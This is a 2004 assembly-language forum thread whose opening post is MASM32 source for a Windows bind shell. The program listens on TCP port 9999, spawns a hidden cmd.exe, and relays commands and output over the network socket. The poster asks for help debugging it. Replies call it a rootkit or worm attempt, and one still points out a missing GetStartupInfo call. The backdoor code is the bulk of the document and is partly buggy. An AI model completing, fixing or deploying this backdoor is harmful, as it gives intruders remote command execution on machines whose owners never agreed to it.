if one debug it,send message to me,my email:linda_010101@hotmail.com
thanks



.386
.model flat,stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shlwapi.inc
includelib \masm32\lib\shlwapi.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
include \masm32\include\wsock32.inc
includelib \masm32\lib\wsock32.lib

TCP_PORT equ 9999


BUFFER_SIZE equ 200
SESSION STRUCT
hReadPipe dd ?
hWritePipe dd ?
hProcess dd ?
sClientSocket SOCKET ?
hReadShellThread dd ?
hWriteShellThread dd ?
SESSION ENDS

.const
szCmd db "C:\WINNT\system32\cmd.EXE",0
szExit db "exit",0dh,0ah,0
szSuc db 'sucess',0
szErr1 db 'createprocess fail',0
szErr2 db 'accept fail',0
.data?
hShellStdinPipe dd ?
hShellStdoutPipe dd ?
hChildStdinRd dd ?
stSin sockaddr_in <?>
stSession SESSION <?>
stWsa WSADATA <?>
hSocket dd ?
hcSocket dd ?
.code

_StartShell proc uses ebx edi hShellStdin,hShellStdout
local @stProcessInformation:PROCESS_INFORMATION
local @stSi:STARTUPINFO
local @hProcess
mov @hProcess,NULL
mov @stSi.cb,sizeof STARTUPINFO
mov @stSi.lpReserved,NULL
mov @stSi.lpTitle,NULL
mov @stSi.lpDesktop,NULL
mov @stSi.dwX,0
mov @stSi.dwY,0
mov @stSi.dwYSize,0
mov @stSi.wShowWindow,SW_HIDE
mov @stSi.lpReserved2,NULL
mov @stSi.cbReserved2,0
mov ebx,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
mov @stSi.dwFlags,ebx
push hShellStdout
pop @stSi.hStdOutput
push hShellStdin
pop @stSi.hStdInput
push hShellStdout
pop @stSi.hStdOutput
invoke CreateProcess,NULL,addr szCmd,NULL,NULL,TRUE,0,\
NULL,NULL,addr @stSi,addr @stProcessInformation


mov edi,@stProcessInformation.hProcess
mov @hProcess,edi
invoke CloseHandle,@stProcessInformation.hThread


mov eax,@hProcess
ret

_StartShell endp

_CreateSession proc

local @stSecurityAttributes:SECURITY_ATTRIBUTES

invoke RtlZeroMemory,addr stSession,sizeof stSession


mov @stSecurityAttributes.nLength,sizeof SECURITY_ATTRIBUTES
xor eax,eax
mov @stSecurityAttributes.lpSecurityDescriptor,eax
mov @stSecurityAttributes.bInheritHandle,TRUE
invoke CreatePipe,addr stSession.hReadPipe,addr hShellStdoutPipe,\
addr @stSecurityAttributes,0

.if eax==NULL
invoke MessageBox,NULL,addr szErr1,NULL,MB_OK or MB_ICONWARNING
.else
invoke CreatePipe,addr hShellStdinPipe,addr stSession.hWritePipe,\
addr @stSecurityAttributes,0
.if eax!=NULL

invoke _StartShell,hShellStdinPipe,hShellStdoutPipe
mov stSession.hProcess,eax
invoke CloseHandle,hShellStdinPipe
invoke CloseHandle,hShellStdoutPipe
mov eax,TRUE
ret
.endif
.endif

_CreateSession endp

_SessionReadShellThreadFn proc uses ebx ecx
local @Buffer:byte
local @Buffer2:byte
local @BytesRead
local @BytesToWrite
.while TRUE
invoke PeekNamedPipe,stSession.hReadPipe,addr @Buffer,sizeof @Buffer,\
addr @BytesRead,NULL,NULL
.break .if eax==NULL
.if @BytesRead>0
invoke ReadFile,stSession.hReadPipe,addr @Buffer,sizeof @Buffer,\
addr @BytesRead,NULL
.else
invoke Sleep,50
.continue
.endif
xor eax,eax
xor ecx,ecx
xor edx,edx
mov ebx,@BytesRead
.while ecx<ebx
mov al,@Buffer
.if al==0ah && ah!=0dh

mov @Buffer2,0dh
.endif

mov ah,@Buffer
mov @Buffer2,ah
inc edx
inc ecx
.endw
mov @BytesToWrite,edx
invoke send,stSession.sClientSocket,addr @Buffer2,@BytesToWrite,0
.break .if eax<=0
.endw
invoke ExitThread,0

_SessionReadShellThreadFn endp

_SessionWriteShellThreadFn proc uses ebx

local @RecvBuffer[1]:byte
local @Buffer:byte
local @EchoBuffer[5]:byte
local @BytesWritten
local @BufferCnt
local @EchoCnt
local @TossCnt
xor ebx,ebx
mov @TossCnt,ebx
mov @BufferCnt,ebx
.while TRUE
invoke recv,stSession.sClientSocket,@RecvBuffer,\
sizeof @RecvBuffer,0
.break .if eax==NULL
mov ah,@RecvBuffer[0]
mov @Buffer,ah
inc ebx
.if ah==0dh
mov @Buffer,0ah
inc ebx
.endif
invoke StrCmpNI,addr @Buffer,addr szExit,6
.if eax==NULL
invoke ExitThread,0
.endif
mov ah,@RecvBuffer[0]
.if ah==0ah || ah==0dh

invoke WriteFile,stSession.hWritePipe,addr @Buffer,\
ebx,addr @BytesWritten,NULL
.break .if eax==NULL
mov @BufferCnt,0

.endif
.endw

_SessionWriteShellThreadFn endp

_doexec proc uses ebx _hClientsocket

local @stSecurityAttributes:SECURITY_ATTRIBUTES
local @ThreadId
local @HandleArray[3]

invoke _CreateSession

mov @stSecurityAttributes.nLength,sizeof SECURITY_ATTRIBUTES
mov @stSecurityAttributes.lpSecurityDescriptor,NULL
mov @stSecurityAttributes.bInheritHandle,FALSE
mov ebx,_hClientsocket
mov stSession.sClientSocket,ebx
invoke CreateThread,addr @stSecurityAttributes,0,\
_SessionReadShellThreadFn,NULL,0,\
addr @ThreadId
mov stSession.hReadShellThread,eax
.if eax==NULL
mov stSession.sClientSocket,INVALID_SOCKET
mov eax,FALSE
ret
.endif
invoke CreateThread,addr @stSecurityAttributes,0,\
_SessionWriteShellThreadFn,NULL,0,\
addr @ThreadId
mov stSession.hWriteShellThread,eax
.if eax==NULL
mov stSession.sClientSocket,INVALID_SOCKET
invoke TerminateThread,stSession.hWriteShellThread,0
mov eax,FALSE
ret
.endif
push stSession.hReadShellThread
pop @HandleArray[0]
push stSession.hWriteShellThread
pop @HandleArray[1]
push stSession.hProcess
pop @HandleArray[2]
invoke WaitForMultipleObjects,3,addr @HandleArray,FALSE,INFINITE
.if eax==WAIT_OBJECT_0+0
invoke TerminateThread,stSession.hWriteShellThread,0
invoke TerminateProcess,stSession.hProcess,1
.elseif eax==WAIT_OBJECT_0+1
invoke TerminateThread,stSession.hReadShellThread,0
invoke TerminateProcess,stSession.hProcess,1
.elseif eax==WAIT_OBJECT_0+2
invoke TerminateThread,stSession.hReadShellThread,0
invoke TerminateProcess,stSession.hWriteShellThread,0

.endif
invoke closesocket,stSession.sClientSocket
invoke DisconnectNamedPipe,stSession.hReadPipe
invoke CloseHandle,stSession.hReadPipe
invoke DisconnectNamedPipe,stSession.hWritePipe
invoke CloseHandle,stSession.hWritePipe
invoke CloseHandle,stSession.hReadShellThread
invoke CloseHandle,stSession.hWriteShellThread
invoke CloseHandle,stSession.hProcess
mov eax,TRUE
ret

_doexec endp
start:
invoke WSAStartup,101h,addr stWsa
invoke socket,AF_INET,SOCK_STREAM,0
mov hSocket,eax
invoke RtlZeroMemory,addr stSin,sizeof stSin
invoke htons,TCP_PORT
mov stSin.sin_port,ax
mov stSin.sin_family,AF_INET
mov stSin.sin_addr,INADDR_ANY
invoke bind,hSocket,addr stSin,sizeof stSin
invoke listen,hSocket,1
.if eax==SOCKET_ERROR
invoke MessageBox,NULL,addr szErr1,NULL,MB_OK or MB_ICONWARNING
.endif

.while TRUE
invoke accept,hSocket,NULL,NULL
.if eax==INVALID_SOCKET
invoke MessageBox,NULL,addr szErr2,NULL,\
MB_OK or MB_ICONWARNING

jmp exit
.else

mov hcSocket,eax
invoke _doexec,hcSocket
.if eax==FALSE
invoke MessageBox,NULL,addr szErr1,NULL,MB_OK or MB_ICONWARNING

.endif
.endif
.endw
exit:
invoke closesocket,hSocket
invoke closesocket,hcSocket
invoke WSACleanup
invoke ExitProcess,NULL

end start
Posted on 2004-08-25 19:47:04 by fuckjp
i could swear i've seen that code before in another thread............. and if i remember right you were unable to explain parts of how it worked yet you claimed you coded it.. you wont get much help with your little rootkit attempt here by reregistering...
Posted on 2004-08-25 22:59:37 by evlncrn8
i just to begin use masm,so i want to practise much,i read nc's code,and i write use masm32,but some error ,so i want somebody help me
Posted on 2004-08-27 11:17:15 by fuckjp
In the spirit of freedom of information, I will tell you one thing that will help you... I will not help with THIS source any further than to tell you that you forgot to GetStartupInfo before you CreateProcess..

In future, if you want to post this sort of thing, think twice, and explain your intentions carefully - I'm suprised this post is still here now, as it surely is in breach of the forum rules on this kind of thing.
Posted on 2004-08-31 22:26:33 by Homer
first look at the code gives me the impression that it is a worm alike executable.
Posted on 2004-09-01 00:43:32 by wizzra